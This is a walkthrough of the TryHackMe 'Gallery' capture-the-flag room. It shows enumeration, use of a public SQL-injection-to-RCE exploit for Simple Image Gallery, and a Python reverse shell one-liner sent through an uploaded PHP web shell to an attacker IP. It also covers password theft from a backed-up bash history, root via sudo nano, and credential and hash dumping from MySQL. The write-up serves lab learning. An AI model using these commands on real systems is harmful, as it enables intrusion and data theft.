Gallery – Walkthrough En | TryHackMe – Write-up
Try to exploit our image gallery system
Enumeration
Command :
nmap -sV -sC -p- 10.10.238.191
Web enumeration:
We will use dirsearch on the ports to determine which directories are present.
Command :
dirsearch -u 10.10.238.191
Command :
dirsearch -u 10.10.238.191:8080
Simple Image Gallery System.
The /login.php page takes us to an authentication for which we do not know the credentials.
On the other hand, we can see the CMS that is used. The landing page also gives us the version of the CMS. v1.0
Initial foothold
A Google search gives us an exploit available for this CMS. This is an RCE following a bypass of authentication via a SQLi. https://www.exploit-db.com/exploits/50214
Exploitation of the flaw.
You must download the exploit and/or save it in .py format. Then run it with the following command :
python3.9 50214.py
On TARGET= you must put the address of the cms.http://10.10.238.191:8080/
System Access.
Once the exploit is executed, you must use the address provided by the exploit. From there, it is possible to place system commands as well as a One liner reverse shell.
Python is installed on the system. We can therefore use it to recover a reverse shell.
Command :
python3.6 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((« 10.11.38.124 »,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([« /bin/sh », »-i »]);’
Command with URL :
http://10.10.238.191/gallery/uploads/1644783960_TagosxtvnjlxilqprhyLetta.php?cmd=python3.6%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.11.38.124%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Lateral movement towards Mike.
After upgrading the shell, you must switch to the user Mike. For this, with the help of linpeas.sh, we find in /var/backups/mike_home_backup/ Mike’s identifiers.
Command :
cat .bash_history
Command :
su mike
password : the one found in bash_history
Escalade de privilège.
Once on Mike’s account, you have to do sudo -l . This allows you to see what the user’s privileges are.
Mike has sudo rights to run the rootkit.sh application. It is quite possible that one can by this means, to pass root. Before executing it, you have to see what is in the script.
Command :
cat /opt/rootkit.sh
It is possible to do several things with this script. Check the version, do an update but also read the report with the read option which will open the report.txt file with nano.
Since the command will be launched with sudo rights, it will be possible once the file is opened with nano, to exit nano with a root shell. All this is shown on the well-known site https://gtfobins.github.io/gtfobins/nano/#sudo
Command :
sudo /bin/bash /opt/rootkit.sh
Error ?
It is possible to have this error: Error opening terminal: unknown.
To avoid this error, run this command :
export TERM=screen
Once the report is opened with nano, you must run these commands:
crtl + r puis ctrl x
This allows you to execute system commands. Then you have to put your last two commands to become root.
reset ; sh 1>&0 2>&0
How to get the hash of the admin account.
Command :
find / -maxdepth 8 -name *.php -type f 2>/dev/null | xargs grep -C 20 -i pass
To learn more about the find command for can watch this article.
Once the identifiers have been retrieved, you must connect to the mysql server
Commande :
mysql -u gallery_user -p
Then you have to do these commands :
show databases;
use gallery_db
show tables;
select * from users;
#
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
I hope he has more of you and that he taught you new things.
Feel free to leave a comment or share this article.
